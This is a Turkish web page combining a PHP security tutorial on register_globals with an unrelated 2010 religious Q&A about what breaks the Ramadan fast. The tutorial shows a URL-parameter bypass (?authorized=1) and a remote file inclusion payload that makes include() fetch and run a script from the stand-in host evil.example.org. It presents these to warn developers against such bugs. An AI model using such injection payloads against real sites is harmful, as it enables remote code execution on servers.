register_globals'ın açık olması durumunda bu sayfa adres satırına ?authorized=1 eklenerek çağırıldığında çok önemli bilgiye ulaşılmış olur. Bu tamamen programlama hatasıdır, register_globals belirtecinin oluşturabileceği tehlikeyi göstermek için basit bir örnektir. register_globals kapalı olduğunda programcı tarafından oluşturulan değişkenler dışarıdan müdahele ile (?authorized=1 gibi) değiştirilemez. Açık oması durumunda ise değişkenler tanımlanırken bir ilk değer verilmelidir.

register_globals'ın çıkarabileceği bir diğer tehlikeli duruma include fonksiyonunun kullanımı örnektir:
code:
< ? include"$path/script.php"; ?>


register_globals açık olduğunda bu sayfayı adres satırına ?path=http%3A%2F%2Fevil.example.org%2F%3F eklenerek çağırıldığında aşağıdaki gibi bir sonuç çıkar.

Code:
< ? include'http://evil.example.org/?/script.php'; ?>


Eğer allow_url_fopen açık ise, ki php.ini de öntanımlı olarak açıktır, bu kod http://evil.example.org/ deki script.php dosyasını sanki aynı makinada bulunan bir dosya gibi çalıştırır. Bu birçok açık kaynaklı uygulamalarda ortaya çıkmış ciddi bir tehlikedir.

Tanımlandığında $path değişkenine bir ilk değer verilerek bu engellenebilir. register_globals'ı kapatarak ta bu engellenebilir. register_globals'ın kapalı olması bu ve bunun gibi programcı hatalarından kaynaklanan açıkların kapatılmasını sağlar.

Formdan gelen ve dışardan gelen verilerin işleneceği durumlarda programcıların bu durumu (register_globals) dikkate almaları gerekir. $_POST ve $_GET dizilerinin kullanılması bir önlemdir. Fakat tehlikeyi tamamen engellemez. Yukarıda da belirtiğimiz gibi değişkenlere başlanğıç değeri verilmesi çok önemlidir. Bu bölümde anlatılanlar register_globals'in bir güvenlik açığı olduğunu göstermez ama kapalı olmasının bir bazı tehlikeleri önlediği kabul edilen bir gerçektir. Ayrıca değerin kapalı olması programcıların kullandıkları değişkenlerin kaynaklarını bilmeleri ve düşünmeleri,ki bu iyi programcının özelliklerindendir, konusunda zorladığı için de faydalıdır.

başka bir deyişle;

get ile aldığımız verileri ?deneme=12345 şeklinde alırken register_globals açıksa;

< ?php echo $deneme; ?>


şeklinde ekrana yazdırabiliriz. oysaki register_globals kapalı olduğunda bu şekilde değişkeni kullanamayız.

< ?php echo $_GET['deneme']; ?>


bu şekilde yaptığımızda get ile gönderdiğimiz deneme nesnesine ulaşabiliriz. aynı durum post methodu içinde geçerli bir durumdur.
session 'ları nasıl etkiliyor peki, register_globals kapalı olduğunda session_register() çalışmaz. session kullanırken her zaman $_SESSION global değişkenini kullanmak en mantıklısıdır.

COOKIE 'de de aynı mantık işlev görür. yanlız cookie'leri yine setcookie fonksiyonu ile tanımlarız. daha sonra $_COOKIE global değişkeni ile bu cookielere ulaşabiliriz.

yani register_globals 'in açık olmasının kısa tanımı şudur; dışarıdan gelen verileri adlarına göre değişken yapar. bu da bazı durumlarda potansiyel güvenlik açıklarına sebep olur. eğer register_globals kapalıysa $_POST,$_GET,$_REQUEST,$_COOKIE,$_SESSION global değişkenlerine dışardan gelen veriler adlarına göre indeks indeks atanır.

unutmadan bir bilgi..

- register_globals php 4.2.0 ile varsayılan değer olarak 'off' değerini almaya başladı
- php 6.0.0 ile register_globals seçeneği tamamen kaldırıldı.


14 Ağustos 2010 Cumartesi

Orucu Bozan ve Bozmayan Seyler

Sual: Orucu bozup bozmayan şeyler hakkında genel bilgi verir misiniz?
CEVAP: Kalb hastasının göğsüne sürdüğü ilaç, orucu bozmaz. Çünkü, sağlam deriye sürülen ilaç, deriden içeriye girse de orucu bozmaz. Dil altına konulup emilenler bozar. Kulağa konulan ilaç da bozar.
Morfinle dişini çektirdikten sonra, oruç bozulduğu için, yiyip içene kefaret gerekmez, kaza gerekir. Bir hastalık sebebiyle de iğne [enjeksiyon] yapılınca oruç bozulur ve kaza gerekir. Oruç bu şekilde bozulduktan sonra yiyip içmek, kefaret gerektirmez. Diş çektirmek orucu bozmaz. Dişten çıkan kan yutulursa oruç bozulur. Ramazan orucunu tutarken iğne vurduranın veya dişinden çıkan kanı yutanın orucu bozulur, gününe gün kaza gerekir, kefaret gerekmez.

İstemiyerek ağız dolusu kusmak orucu bozmaz. İsteyerek, zorlıyarak az bir kusma da orucu bozmaz ise de, ağız dolusu kusmak bozar. Hadis-i şerifte (Kendiliğinden ağız dolusu kusanın orucu bozulmaz. İsteyerek ağız dolusu kusanın orucu bozulur, kazası gerekir.) buyuruldu.

Tıraş olurken kanayan yere, kanın durması için kantaşı sürmek orucu bozmaz.

Gündüz uyurken ihtilam olunca oruç bozulmaz. Uyanınca ilk fırsatta gusledilir. Hadis-i şerifte, (İhtilam olmak orucu bozmaz.) buyuruldu. Gusletmekle de oruç bozulmaz. Guslederken vücudun içine su girmemesine dikkat etmelidir! İçeri su girerse oruç bozulur.

Basur dışarıda iken taharetlendikten sonra, yaş olarak içeri girerse oruç bozulur. Taharetlendikten sonra kurulanırsa bozulmaz.

Bir hasta, ilaç alarak, orucunu bozsa, kefaret gerekmez. Çünkü dinimizin bildirdiği bir özürle, yani zaruretle oruç bozulunca yalnız kaza gerekir. Fakat basit bir hastalık için oruç bozmamalıdır!

Abdest alırken hata ile boğazına su kaçan, orucu bozulduğu için yiyip içse, yalnız kaza gerekir.

Kulağa damlatılan ilaç orucu bozar. Göze damlatılan ilaç bozmaz. Dişe konulan ilaç, yutulmadığı müddetçe orucu bozmaz. Hatta ilacın tadı boğazda hissedilse de bozmaz. Ağızdaki yara, namazda okumaya mani değilse, ilaçla gargara mekruh olur. Okumaya mani olursa, ilaçla gargara etmek mekruh olmaz. Çünkü özür vardır.

Oruçlu iken dişleri macunla fırçalamak mekruhtur. Boğaza kaçarsa oruç bozulur.

Ramazan-ı şerifte gündüz muayyen hali sona eren kadın, bir şey yiyip içmeden oruçlu gibi durur. Fakat oruçlu iken muayyen hali zuhur eden kadının, oruçlu gibi durması gerekmez, yiyip içebilir.

Yaraya sürülen merhemin, sindirim yoluna veya beyne gittiği bilinmiyorsa oruç bozulmaz.

Tozlu, dumanlı şey koklamak, başkasının içtiği sigara dumanı yahut tütsülerin dumanını çekmek orucu bozar. Fakat ağzından veya burnundan boğazına toz, duman kaçsa, oksijen gazı tüpü ile sunî hava verilse, başkalarının içtiği sigaranın dumanı ağzına, burnuna girmesinden sakınmak mümkün olmasa, oruç bozulmuş olmaz. Unlu işlerde çalışanın sakındığı halde, ağzına burnuna giren un tozları orucu bozmaz. Kömür işinde çalışan kimsenin ağzına, burnuna kömür tozu girse, orucu bozulmuş olmaz. Çünkü bundan sakınma imkanı yoktur. Diğer toz ve dumanların hükmü de böyledir. (Dürer)

Sual: Damardan serum verilmesi, sadece imam-ı azama göre orucu bozduğu söyleniyor. Diğer mezheplere göre bozmuyor mu? Serumla gıda ve deva verilebiliyor. İhtiyacı olan suyu, gıdayı ve ilacı serumla alan kimsenin orucu bozulmaz mı? Oruçta gaye, yiyip içmeyi terk etmek olduğuna göre, ağız yolu ile değil de, damar yolu ile yiyip içenin orucu niçin bozulmaz?
CEVAP: Dört mezhepte de, sağlam deriye konan ilaç, gıda ve deva, emilip içeriye nüfuz etse de oruç bozulmuş olmaz. Mesela kalb hastalığında, göğüs üzerine nitroderm ihtiva eden bir ilaç [TTN] konur. Bu deriden içeriye emilir. Sağlam deriden içeri girdiği için dört mezhepte de orucu bozmaz. Bunun gibi, sağlam deriye konan nikotin yakısı da, vücut tarafından emildiği halde, dört mezhepte de orucu bozmaz.

Tabiî menfezlerden [deliklerden] giren şeyler orucu bozar. Şafiîde, kulak tabii menfezdir. Kulağa konan sıvı-katı her şey, mideye girmiş gibi orucu bozar. Şafiide idrar yolu da tabii menfezdir. Buraya ilaç, hatta pamuk konsa bile orucu bozar.

Dört mezhepte de ve bütün imamlara göre, yaraya konulan ilaç, cevfe [içeriye] giderse oruç bozulur. Şâfiî mezhebinde, dimağ [beyin], karın, bağırsak, mesane birer cevftir. Meselâ, baştaki kemik yarılsa, buradaki yaraya konulan ilaç, cevfe, yani beyne gideceğinden oruç bozulmuş olur.

Şafiî’de karna bıçak saplansa, bıçağın ucu mideye, yani cevfe girdiği için oruç bozulur. Sağlam deriden bıçak cevfe girince oruç bozulduğu gibi, iğne ile adaleyi veya damarı yırtarak verilen ilaç, cevfe ulaşınca oruç bozulmuş olur. Hanefi’de ise, bıçak tamamen midenin içine girerse oruç bozulur.

Bugün tıpta, serumun mesaneye, dimağa ve vücudun her yerine gittiği kesin olarak bilinmektedir. O hâlde serum, dört mezhepte de orucu bozar. Sadece kaza gerekir. (Serum veya enjeksiyonla verilen ilaç, cevfe, [yani dimağ ve mesane gibi yerlere] gitmez) demek, çok yanlış olur, ilme ters olur.

Bütün doktorlar, damardan veya adaleden verilen ilacın, dimağ ve mesaneye gittiğini bildiriyorlar. O halde, işin aslını bilmeyenlere kanıp da, enjeksiyonla orucu telef etmiyelim.
[Buradaki hanefi mezhebi ile ilgili bilgiler, Tahtâvî, Mebsut, Bedayi ve benzeri kitaplardan, Şâfiilerle ilgili bilgiler ise, Mecmû, Muğnil muhtaç, Tuhfe, Envâr, Kummesrâ, Bâcuri, Şerh-i İbni Bâcuri gibi muteber eserlerden alınmıştır.]

Sual: Bir hoca, (Hanımı ile ilişkide bulunmak orucu bozmaz) dedi. İlişki orucu bozmaz mı?

CEVAP Bunu bir hocanın söylemesi mümkün değildir. Muhakkak bir yanlış anlama vardır. Cahil bir kimse bile böyle şey söylemez. İlişkide bulunmak orucu bozar ve kefaret gerekir. (Dürer)
Şâfiî mezhebinde, ilişkide bulunan erkeğe kefaret gerekir, hanıma ise kefaret gerekmez, fakat yine orucu bozulmuş olur, sadece kaza gerekir. (Tuhfe)
İlişkide kefaretin gerçekleşmesi için şu şartların bulunması gerekir:
1- Ramazan orucunu bozmuş olması gerekir. Ramazan orucunun kazasını tutarken veya başka oruç tutarken, bozana kefaret gerekmez.
2- Ramazan orucuna imsakten önce niyet etmiş olmalıdır. İmsakten sonra oruca niyet ederse veya hiç niyet etmeden ilişkide bulunursa, haram işlemiş olursa da, yalnız kaza gerekir.
3- Kasten ilişkide bulunmuş olmalıdır. Eğer unutarak ilişkide bulunmuşsa, kefaret gerekmediği gibi, oruç da bozulmuş olmaz, unutmak özür olur. Kefaret, orucu bozmanın değil, mübarek Ramazan-ı şerif ayının hurmet ve namus perdesini yırtmanın cezasıdır.
4- İlişki, imsak vaktinden sonra yani gündüz olmalıdır. Eğer imsak vaktine daha var zannı ile ilişkide bulunduktan sonra, imsak vaktinin geçmiş olduğunu anlarsa, kasten orucunu bozmadığı için sadece kaza gerekir, kefaret gerekmez.
5- İlişkiden sonra oruç tutamayacak kadar hasta olan kimseye kefaret gerekmez. Bunun gibi bir kadın ilişkide bulunduktan sonra, hayz hali vuku bulursa, yine kefaret gerekmez.
6- Kefaret olması için, ikamet ettiği yerde orucunu kasten bozmuş olmalıdır. Eğer seferde iken bozarsa, kaza gerekir. Çünkü seferde oruç tutmak farz değildir. Seferde oruç tutmayan, sonra kaza eder.
7- Karı-koca kendi arzuları ile ilişkide bulunmuş olmalıdır. Mülci ikrah ile zorlanırsa, kefaret gerekmez. İkrah, bir insanı, istemediği birşeyi yapması için, haksız olarak zorlamak demektir. Birini zorlamanın ikrah olması için şu dört şart gerekir:
Zorlayan kimsenin, korkuttuğu şeyi yapabilecek kuvvette olması, zorlananın korkutulan şeyin muhakkak yapılacağını bilmesi, korkutulan şeyin, ölüm veya bir uzvun kesilmesi veya üzücü birşey olması, zorlanan şeyin, yapılmaması gereken birşey olması gerekir. (İbni Abidin, Dürer-ül-hükkâm)

Bazı kimseler de, masturbasyonun orucu bozmadığını, bazıları da bozduğunu ve kefaret gerektiğini söylüyorlar. Bunların ikisi de yanlıştır. Masturbasyonun orucu bozduğu, fakat sadece kaza gerektiği, Hindiyye, Bahr ve Dürr-ül-muhtâr ve diğer fıkıh kitaplarında yazılıdır. Bir Ramazanda iki defa masturbasyon yapana kefaret de gerekir. Çünkü Ramazanın bir gününde, kaza gereken birşey yaparak orucunu bozan kimse, başka gününde de bu şeyi kasıtla yine yaparsa, kefaret de gerekir.

Sual: Sigara içilen bir kahvede oturmakla oruç bozulmuş olur mu?
CEVAP Kendi isteği ile içine veya genzine duman çekmek orucu bozar. (N. İslâm)
Buradan anlaşılıyor ki, sigaradan nefret eden bir kimse de, kendi isteği ile, sigara içilmiş bir odaya girip dumanı teneffüs etse, orucu bozulur ve sadece kaza gerekir.
Dumandan sakındığı hâlde, ağzına veya burnuna duman girse, orucu bozulmaz. İstemiyerek ağza, burna giren tozlar da bozmaz. Çünkü bundan sakınma imkânı yoktur.
Sual: Ventolin, Salbutol gibi ağıza püskürtülen ilaçlar orucu bozar mı?
CEVAP: Bahsettiğiniz ilaçları kullanınca oruç bozulur.

Sual: Erkeklerin idrar yoluna koyduğu pamuk, Şâfiî mezhebine göre orucu bozar mı?
CEVAP Pamuk tamamen kaybolmuşsa, Şâfiîde oruç bozulmuş olur.
Sual: Kadın ve erkeğin ilâç olarak kullandıkları fitil, orucu bozar mı ve guslü gerektirir mi?
CEVAP Gündüz kullanırsa oruç bozulur. Fakat guslü gerektirmez.

Sual: Burnum kanadı. Bu arada genzime giden kanı yuttum. Orucum bozuldu mu?
CEVAP Burundan genize giden kanı veya dişi kanayan ağzındaki kanı yutunca, yanî kan mideye gidince oruç bozulur. Sadece kazâ gerekir. (Mevkûfât)

Sual: Buruna sıvı ilâç veya tuzlu su çekmek orucu bozar mı?
CEVAP Beyne veya boğaza giderse bozar.

Sual: Kulağı antiseptikli su ile yıkatmak orucu bozar mı?
CEVAP Bozar. İlâçsız su ile yıkamak bozmaz.

Sual: Hasta, su buharını teneffüs etse orucu bozulur mu?
CEVAP Ciğerlere giderse bozar.

Sual: 1- Kalb hastasıyım. Bazan çok ağrı oluyor. Hap alınca ağrı geçiyor. Ramazanda oruçlu iken ağrı tuttuğunda ilâç alırsam, kazâ mı, kefâret mi icâb eder?
CEVAP Zarûret olduğu için yalnız kazâ gerekir. Göğüse sürülen ilâçları kullanmak iyi olur. 2- Kalb hastasının göğsüne sürdüğü ilaç, orucu bozar mı? CEVAP Sağlam deriye sürülen ilaç, içeriye gitse de orucu bozmaz. Dil altına konulup emilen bozar. (Tahtavî)

Sual: Diş çektirmek orucu bozar mı?
CEVAP Diş çektirmek orucu bozmaz. Eğer diş çektirilirken iğne vurulursa, oruç bozulur. Dişten çıkan kanı yutmakla da oruç bozulur. Ramazan orucunu tutarken iğne vurduranın veya dişinden çıkan kanı yutanın orucu bozulur, gününe gün kaza gerekir, kefaret gerekmez. (M. Felâh)

Sual: Oruçlu iken namazda okumama mâni olacak ağızdaki yaralar için, yutmadan ilaçla gargara yapıyorum. Mekruh olur mu?
CEVAP Ağızdaki yara, okumaya mâni değilse, ilaçla gargara mekruh olur. Okumaya mâni olursa, ilaçla gargara etmek mekruh olmaz. Çünkü özür vardır. (Tahtâvî)

Sual: Ağrıyan dişe, göze ve kulağa ilaç konsa oruç bozulur mu?
CEVAP Kulağa damlatılan ilaç orucu bozar. Göze damlatılan ilaç bozmaz. Dişe konulan ilaç, yutulmazsa orucu bozmaz. Hatta ilâcın tadı boğazda hissedilse de bozmaz. (Mecmaul-fetâvâ)

Sual: Yaraya konan ilaç orucu bozar mı?
CEVAP Yaraya sürülen merhemin, sindirim yoluna gittiği bilinmezse oruç bozulmaz.

Sual: Epilasyon orucu bozar mı?
CEVAP Bozmaz.

Sual: Oruçlu iken çiçek, esans koklamak orucu bozar mı?
CEVAP Çiçek, esans koklamakla oruç bozulmaz, mekruh da değildir. (R. Muhtâr)

Sual: Ağızdaki az bir kanı yutanın namazı ve orucu bozulur mu?
CEVAP Az olduğu için bozulmaz.

Sual: Oruçlu iken gusletmek orucu bozar mı?
CEVAP Gusletmekle oruç bozulmaz. Ancak ağızdan, burundan içeri su kaçarsa veya su içine oturulunca veya taharetlenirken içeri su kaçarsa oruç bozulur. (Dürer)

Sual: Dudaktaki yaşlığı yutmak orucu bozar mı?
CEVAP Bozmaz.

Sual: İmsâk vakti sona ererken yaraya konan sıvı ilâç, sabah vakti girdikten sonra emilmeye başlasa oruç bozulmuş olur mu?
CEVAP İmsâktan önce konulduğu için bozulmaz.

Sual: Makata konan pamuğun bir kısmı dışarıda kalsa orucu bozar mı?
CEVAP Bozmaz, hepsi içeri girerse bozar.

Sual: Yalan, gıybet, harâma bakmak gibi günâhlar orucu bozar mı?
CEVAP: Hadîs-i şerîfte, (Gıybet etmek, söz taşımak, yalan yere yemin etmek, nâmahreme şehvetle bakmak orucu bozar) buyuruldu. İmâm-ı a'zâm hazretleri, bu hadîs-i şerîfi açıklıyor ve, (Bu günâhlar orucun sevâbını bozar, sıhhatini bozmaz, oruç mekrûh olur) buyuruyor. Yanî bu günâhları işliyen, oruç borcundan kurtulur ise de, oruca mahsûs büyük sevâba kavuşamaz. Hadîs-i şerîfte buyuruldu ki: (Nice oruç tutan vardır ki, açlık ve susuzluktan başka bir şey elde etmez) [I. Mâce].
Oruç, mü'minler için bir nimet ve emânettir. Emânete riâyet etmek lâzımdır. Onun zâyi' olmaması için şartlarını ve edeplerini gözetmek îcâb eder. Harâma bakmaktan sakınmalıdır! Hadîs-i şerîfte buyuruldu ki: (Harâma bakmak, şeytanın zehirli bir okudur. Allahtan korkup bunu terkedene, Allahü teâlâ öyle bir îmân verir ki, tatlılığını kalbinde bulur.) [Hâkim].
Oruçlu, dilini de korumalıdır! Hadîs-i şerîfte buyuruldu ki: (Oruç, ateşe kalkandır. Gıybetle parçalanmadıkça korur. Oruçlu câhillik edip de kötü söz söylemesin! Biri kendine sataşırsa, "ben oruçluyum" desin!) [Buhârî].
Gözü ve dili günâhlardan koruduğumuz gibi, kulağımızı da korumamız lâzımdır. Konuşulması harâm olan şeyi, dinlemek de harâmdır. El, ayak ve diğer uzuvları da harâmdan korumalıdır! Oruç tutup a'zâları ile günâh işleyen, ilâç yerine zehir içen hastaya benzer. Çünkü günâh zehirdir. İbâdetlerimizin sevâbını yok eder. Onun için oruçlarımızı ve diğer ibâdetlerimizi harâm işleyerek sevâbsız hâle getirmemeliyiz!

Sual: Bir hasta, ilaç alarak, orucunu bozsa, kefaret gerekir mi?
CEVAP Dinin bildirdiği bir özürle, yani zaruretle oruç bozulunca, yalnız kaza gerekir.

Sual: Depresyon halinden şuursuz olarak oruç bozunca kefaret gerekir mi?
CEVAP İmsaktan sonra, ezan okunurken, ne yaptığınızı bilmeden orucu bozmuşsanız kaza gerekir. Eğer orucu bozduğunu biliyorsanız, kefaret gerekir. Anlattığınız depresyon hâlinden sanki şuursuz olarak bozduğunuz anlaşılmaktadır. Şuursuz bozulunca da kaza gerekir.

Sual: Orucunu bir mazeretle bozan hastaya kefâret mi, yoksa kazâ mı gerekir?
CEVAP Dînimizin bildirdiği bir özürle orucunu bozan hasta, o gün yediği orucu daha sonra uygun bir günde kazâ eder. Kefâret lâzım olmaz. (Hindiyye)

Sual: Morfinle dişini çektirdikten sonra, "orucum bozuldu" diye yiyip içene kefâret mi gerekir?
CEVAP Hayır kefâret gerekmez, kazâ gerekir. Bir hastalık sebebiyle de iğne [enjeksiyon] yapılınca oruç bozulur ve kazâ lâzım gelir. Oruç bozulduktan sonra yiyip içmek, kefâret gerektirmez. (R.Muhtâr)

Sual: Abdest alırken hata ile boğazına su kaçan kimse, orucu bozulduğu için yiyip içse, kefaret mi gerekir?
CEVAP Orucu kasten bozmadığı için, yalnız kaza gerekir. (Hidâye)

Sual: Nisâiyeci bir kadın doktora muayene olanın, orucu bozulur mu? Bozulursa, kefaret mi gerekir?
CEVAP Doktor, eldivene herhangi bir ilaç, yağ sürerse, oruç bozulur, sadece kaza gerekir. (Dürer)

Sual: Oruçlu olduğunu unutarak yiyen, sonra bilerek yiyip içmeye devam ederse, kefâret gerekir mi?
CEVAP Oruçlu olduğunu unutarak yiyen kimse, orucunun bozulduğunu zannederek yiyip içmeye devam ederse kazâ lâzım olur, kefâret lâzım olmaz. Eğer oruçlu olduğunu unutarak yedikten sonra, unutarak yiyip içmenin orucu bozmadığını bildiği hâlde, kasten yiyip içmeye devam ederse, hem kazâ, hem de kefâret lâzım olur. (Nûr-ül-izâh)

Sual: Ramazanda birkaç gün oruç tutmadım. Kefâret gerekir mi?
CEVAP Ramazan ayında mazeretsiz oruç tutmamak harâmdır, büyük günâhtır. Önce tutulmayan oruçlar için tevbe edilir. Sonra gününe gün yanî kaç gün tutulmamışsa o kadar gün kazâ orucu tutulur. Bir kimse, Ramazan ayında 30 gün oruç tutamasa, tutamadığı gün kadar kazâ orucu tutar. Bu oruçlara kefâret gerekmez. Kefâret, oruç tutmamanın değil, niyetli iken Ramazan orucunu mazeretsiz bozmanın cezâsıdır. (Hindiyye)

Sual: Omuzlarım ağrılar şiddetleşti. Doktor iğne yapılması gerektiğini söyledi. Yapılacak iğne orucu bozar mı? Bozarsa gününe gün mü tutulacak yoksa kefaret orucu mu tutulacak?
CEVAP İğne olmak (enjeksiyon) orucu bozar kaza gerekir, yani gününe gün tutulur, kefaret gerekmez.

Sual: Omuz ve sırt ağrılarından dolayı krem kullanıyorum. Bunun oruca bir zararı olur mu?
CEVAP Hiç bir krem orucu bozmaz.

Sual: Abdest alırken diş etlerinden kan gelirse abdest bozulur, oruç bozulur mu?
CEVAP Kan ağızdan dışarı çıkarsa bozulur. Yutulursa abdest bozulmaz, fakat bu sefer de oruç bozulur. Tükürükten az ise, oruç da abdest de bozulmaz.

Sual: Harama bakmak, gıybet etmek, kötü söz söylemek, caiz olmayan şeyleri dinlemek, bunların orucun faziletine bir mahzuru var mı?
CEVAP Dediğiniz şeylerin hepsi orucun sevabını azaltır, fakat orucu bozmaz. Akşam içki ile orucunu açsa, yine oruç tutmuş olur, oruç borcundan kurtulur, fakat orucuna sevap alamaz. Yalan söyleyen, harama bakan da öyle. Demek ki orucu bozan şeylerle, orucun sevabını gideren şeyler farklıdır.

Sual: Masturbasyon yapmak sadece kaza gerektiğini yazdınız. Benim aklıma göre
kasten orucu bozuyor, kefaret gerekir diyorum. Hangi kitapta kaza gerektiği yazılıdır?

CEVAP Masturbasyon, yalnız kaza lâzım olduğu, Fetavai- Hindiyye, Bahrürraik ve
Dürr-ül-muhtâr kitaplarında yazılıdır. Kefaret gerekir diye hiç bir kitapta yoktur. Akıl ile din olmaz. Dinde nakil şarttır.

Sual: Porno film seyrederken cünüp oldum. Sadece baktım, başka şey yapmadım. Orucum bozuldu mu?
CEVAP Sadece bakarak cünüp olunca oruç bozulmaz. El ile veya başka bir şeyle cünüp olmaya yardım edilmişse, o zaman kaza gerekir.

Sual: Nezle olduğum için burnumun içine gelen akıntıyı geri çekip yuttum, orucum bozuldu mu?
CEVAP Bozulmadı.

Sual: Gündüz uyurken ihtilam olmuşum, orucum bozuldu mu?
CEVAP Gündüz ihtilam olunca da oruç bozulmuş olmaz.

Sual: Oruçlu iken gusl ederken, gargara yapınca, mutlaka boğazıma su kaçtı gibi his ediyorum, belki vesvese de olabilir. Ama, bana, gargara yapınca kaçmaması imkansız gibi geliyor. Ne yapmam gerekir?
CEVAP Oruçlu iken gargara yapılmaz, yapma yani.

Sual: Ağzıma balgam geliyor, yutuyorum, oruç bozuluyor mu?
CEVAP Balgamı yutmakla oruç bozulmaz

Soru: İmsak vakti çok yemek yiyorum. İmsak çıktıktan sonra yemek kaynarken ağzıma geliyor, yutuyorum. Orucum bozuluyor mu?
CEVAP Bozulmaz. Hatta ağzınıza gelen kusmuğun geri gitmesi de orucu bozmaz.

Soru: Oruçlu iken burnumuza su çektik ve genzimizden geçip ağzımızdan çıktı ama yutmadık, oruç bozuldu mu?
CEVAP Evet bozuldu. Buruna ilaç çekmek gibi su da çekip genize ulaşırsa oruç bozulur, kaza gerekir.

Soru: Abdest alınca veya ağzımızı yıkayınca kalan yaşlığı yutmak orucu bozar mı?
CEVAP Ağzı yıkadıktan sonra ağızda kalan yaşlığı tükürük ile yutmak orucu bozmaz.

Soru: Ağzımızdaki tükürük, dışarı çıksa, mesela dudağımızdan aşağı doğru sarksa, onu yalayıp yutsak orucumuz bozulur mu?
CEVAP Tükürüp tükürüğümüzü yalarsak oruç bozulur, kaza gerekir. bahsettiğiniz şekilde olursa oruç bozulmamış olur. Sanki bir kısmı daha ağzımızda oluyor.

Sual: Hayzlı kadın o gün yiyip içebiliyor mu, sadece su içer gün boyu birşey yemez diye bir söylenti var?
CEVAP Niye su içiyor da, cola falan içmiyor, bir şeyler yemiyor. Bunların aslı yoktur. Her şey yiyip içebilir. Ama başkalarının gözü önünde yiyip içmemelidir.

Sual: Amerikadan yola çıkıyorum. Gece yolculuğu yapacağım. Sahur vaktinde uçakta olacağım, hangi ülkeye göre imsak vaktini esas alacağım. Evim Hollandada. Eve dönünce Hollanda'nın iftar vaktini mi esas alacağım?
CEVAP Çıktığınız ülkenin yani Amerikanın imsak vakti esas alınır. Gittiğiniz yerin de iftar vakti esas alınır. Yani Hollandanın. Güneş batmadan iftar edilmez.

Sual: Uçakta namazımı da normal namaz kılar gibi kılacağım, ama oturarak, değil mi?
CEVAP Namazı uçakta normal kılacaksınız. Ayakta kılacaksınız. Dört rekatlı farzları iki rekat olarak kılacaksınız. Ayakta kılma imkanı yoksa koltukta bağdaş kurup veya diz üstü oturarak ima ile kılarsınız. Sandalyede oturur gibi kılınmaz.

Sual: Banyo yapınca, banyoda oluşan buharı teneffüs etmek oruca zarar verir mi ?
CEVAP Normal su buharı zarar vermez.
Sual: Ramazan ayı içerisinde bir insan yatsıdan sonra hanımıyla beraber olsa daha sonra geç vakitte uyuyup biraz sonra guslederiz deseler uyandıklarında da güneş doğmuş olsa 61 gün oruç tutmaları mı gerekir?
CEVAP Oruca zarar vermez. Akşama kadar cünüp durulsa yine oruca zarar vermez. [Yani oruçları devam eder, bozulmuş olmaz. İhtilam olanın da orucu bozulmuş olmaz.] Fakat namaz kılmak için ilk fırsatta yıkanmak gerekir.

Sual: Eldeki yarıklara krem sürmek, cildi yumuşatmak için krem sürmek orucu bozar mı?
CEVAP Bozmaz.

Sual: Şeker hastalarının iğne yaptırması orucu bozar mı?
CEVAP Hangi iğne olursa olsun, enjeksiyon yapmak orucu bozar.

Sual: Göz damlasının oruca zararı var mı? Lens te ıslakken (Kendi özel sıvısının ıslaklığı) göze takılıyor. Birşey olur mu?
CEVAP Göz damlası orucu bozmaz.

Sual: Ramazanda sahurda yatmadan önce dişlerimizi fırçalıyoruz. Ağzımızı yıkamamıza rağmen tadı ağzımızda hissediliyor bu durumun oruca zararı olur mu?
CEVAP Hayır olmaz.

Sual: Ciltde bulunan hastalığa örneğin mantara sürülen krem oruca zarar verir mi?
CEVAP Hayır vermez.

Sual: Hanefi mezhebine göre "tükürdüğümüz zaman tükürükte tükürükten az miktarda kan olursa" abdest bozulur mu, yutunca oruç bozulur mu?
CEVAP Kan tükürükten az ise dışarı çıkmakla abdest bozulmaz, yutulunca da oruç bozulmaz.

Sual: Sigara tiryakisiyim, sigara içmezsem oruç tutmam çok zor. Sigara yakıları var. Bunları koluma koysam, deri nikotini emiyormuş. Orucum bozulur mu?
CEVAP Sağlam deriye konan hiç bir yakı, ilaç orucu bozmaz. Emilmesinin önemi yok.

Sual: Sinüzitten muzdarib bir hasta oruçlu iken burnuna ilac koyabilir mi? (püskürtülen cinsinden bir ilaç)
CEVAP Oruç bozulur.

Sual: Oruçluyken kulaktan iltihap akması orucu bozar mı?
CEVAP Bozmaz.

Sual: Kan aldırınca oruç bozulur mu?
CEVAP Bozulmaz.

Sual: Çocuğunu emziren bir anne oruç tutabilir mi?
CEVAP Eğer çocuğa zarar verecekse. kendine bir zararı dokunacaksa, tutmaz, iyi olduğu zaman kaza eder. Çocuğa zararı olmayacaksa tutar. Bunu da müslüman namaz kılan bir doktor bilir. Yani o çocuğa zarar gelir oruç tutma derse tutulmaz, zararı olmaz tut derse tutulur.

Sual: Oruçlu iken gusl abdesti almak caiz midir? Orucu bozar mı?
CEVAP Guslederken su içine oturulmazsa zararı olmaz. Oruçlu iken yıkanmakta da mahzur yoktur.

Sual: Ramazanda sabah kalktım işe gittim. Öğle namazı için mescide gitmeden evvel tuvalet ihtiyacımı gidermek için tuvalete girdim. İç çamaşırımda meni kalıntıları gördüm. Rüya gördüğümü kesinlikle hatırlamıyorum. Oruçlu idim. Ne yapacağımı bilemedim. Akşama kadar abdest alamadım. İşi bırakıp da eve gidemedim. Şimdi benim orucum zarara uğradı mı uğramadı mı? Kefaret mi yoksa kaza mı gerekiyor?
CEVAP Önce meni olup olmadığı önemli. Diyelim ki meni ise, yani rüyayı hatırlamasanız da şehvetle meni gelmişse, cünüp oldunuz. Cünüp durmak haram ise de, orucu bozmaz. Oruç bozulmadığına göre, siz orucu değil, namazı düşünmeniz gerekirdi. Namazlar ne oldu? Namaz kılmamak çok büyük günahtır.

Sual: Oruçlu iken dişleri macunlu macunsuz firçalamak orucu bozar mı?
CEVAP Macunsuz firçalamakta mahzur yoktur. Macunlu firçalamakla da oruç bozulmaz fakat mekruh olur. Macun yutulursa oruç bozulur, kaza gerekir.

Sual: Oruçlu iken kulağa pamuklu çubuk sokmakta mahzur var mıdır?
CEVAP Şafiide orucu bozar, hanefide bozmaz.

Sual: Buruna ilaç sürmek orucu bozar mı?
CEVAP Katı ilaç bozmaz, sıvı ilaç bozar.

Sual: Jöle, krem, deodorant orucu bozar mı?
CEVAP Hiç birisi bozmaz.

Sual: Dudaktaki teri veya yaşlığı yalayıp yutmak orucu bozar mı?
CEVAP Dudaktaki yaşlığı yutmak orucu bozmaz. Abdest aldıktan sonra ağızdaki yaşlığı yutmak da bozmaz.

Sual: Hanımımı öptüm orucum bozuldu mu?
